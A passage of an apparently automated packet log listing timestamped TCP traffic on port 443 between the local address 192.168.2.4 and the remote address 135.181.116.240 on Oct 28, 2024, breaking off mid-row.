                                                                                                                                            Oct 28, 2024 15:49:50.198245049 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198324919 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198345900 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198391914 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198896885 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198983908 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199012995 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199073076 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199124098 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199234009 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199235916 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199259043 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199292898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199309111 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199364901 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199421883 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199712992 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199793100 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199824095 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199889898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199911118 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200037003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200432062 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200515985 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200546026 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200656891 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200681925 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200691938 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200732946 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200732946 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200752974 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200818062 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201244116 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201325893 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201404095 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201493025 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201500893 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201524019 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201566935 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201631069 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201963902 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202022076 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202090025 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202171087 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202222109 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202285051 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202333927 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202434063 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202480078 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202487946 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202517986 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202630043 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203165054 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203231096 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203277111 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203341007 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203372955 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203469992 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203527927 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203619003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203684092 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203787088 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203799963 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203866959 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.204287052 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.204365015 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.204484940 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.204559088 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.225969076 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.226063967 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.2